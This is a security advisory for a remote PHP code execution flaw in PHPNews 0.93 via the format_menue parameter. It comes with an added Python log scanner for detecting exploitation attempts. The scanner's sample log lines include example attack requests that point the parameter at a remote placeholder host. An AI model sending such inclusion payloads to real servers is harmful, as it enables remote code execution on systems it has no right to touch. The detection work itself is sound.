PT-2007-5425 · Andreas Robertz · Andreas Robertz Phpnews
Kezzap66345
Published: 2007-08-08 · Updated: 2017-09-29 · CVE-2007-4232
CVSS v2.0: 6.8 (Medium)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Name of the Vulnerable Software and Affected Versions
Andreas Robertz PHPNews version 0.93
Description
The issue allows remote attackers to execute arbitrary PHP code via a URL in the format_menue parameter in the admin/inc/change_action.php file.
Recommendations
For Andreas Robertz PHPNews version 0.93, consider restricting access to the admin/inc/change_action.php file to minimize the risk of exploitation. Avoid using the format_menue parameter in the affected API endpoint until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.
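A log check that supports the recommendation above, as an added example that is not part of the original advisory or of PHPNews: it scans web-server access logs for requests to admin/inc/change_action.php whose format_menue value is a URL. The combined log format, the function name and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script path and parameter named in the advisory (CVE-2007-4232).
TARGET_SCRIPT = "admin/inc/change_action.php"
TARGET_PARAM = "format_menue"

# Assumption: the server writes Apache/nginx "combined" access logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A value starting with a URL scheme or "//" points outside the local tree.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//)', re.IGNORECASE)


def find_suspicious_requests(lines):
    """Return (ip, timestamp, status, value) for requests matching the advisory."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        parts = urlsplit(m.group("target"))
        if not parts.path.lower().endswith(TARGET_SCRIPT):
            continue
        # parse_qs percent-decodes, so encoded schemes (http%3A%2F%2F) are caught.
        params = parse_qs(parts.query, keep_blank_values=True)
        for value in params.get(TARGET_PARAM, []):
            if REMOTE_RE.match(value):
                hits.append((m.group("ip"), m.group("ts"), int(m.group("status")), value))
    return hits


# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Aug/2007:10:01:02 +0000] "GET /phpnews/index.php HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.7 - - [08/Aug/2007:10:05:44 +0000] "GET /phpnews/admin/inc/change_action.php?format_menue=http%3A%2F%2Fremote.example%2Fx.txt HTTP/1.1" 200 312 "-" "-"',
    '192.0.2.10 - - [08/Aug/2007:10:06:00 +0000] "GET /phpnews/admin/inc/change_action.php?format_menue=list HTTP/1.1" 200 900 "-" "-"',
    '203.0.113.5 - - [08/Aug/2007:10:07:13 +0000] "GET /phpnews/ADMIN/inc/change_action.php?format_menue=FTP://remote.example/y HTTP/1.1" 403 199 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_suspicious_requests(SAMPLE_LOG):
        print(hit)
```

Access logs record only the query string, so a value sent in a request body will not appear in this check. A hit with a 403 status indicates the access restriction is already blocking the request.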
Related Identifiers
Affected Products
Andreas Robertz Phpnews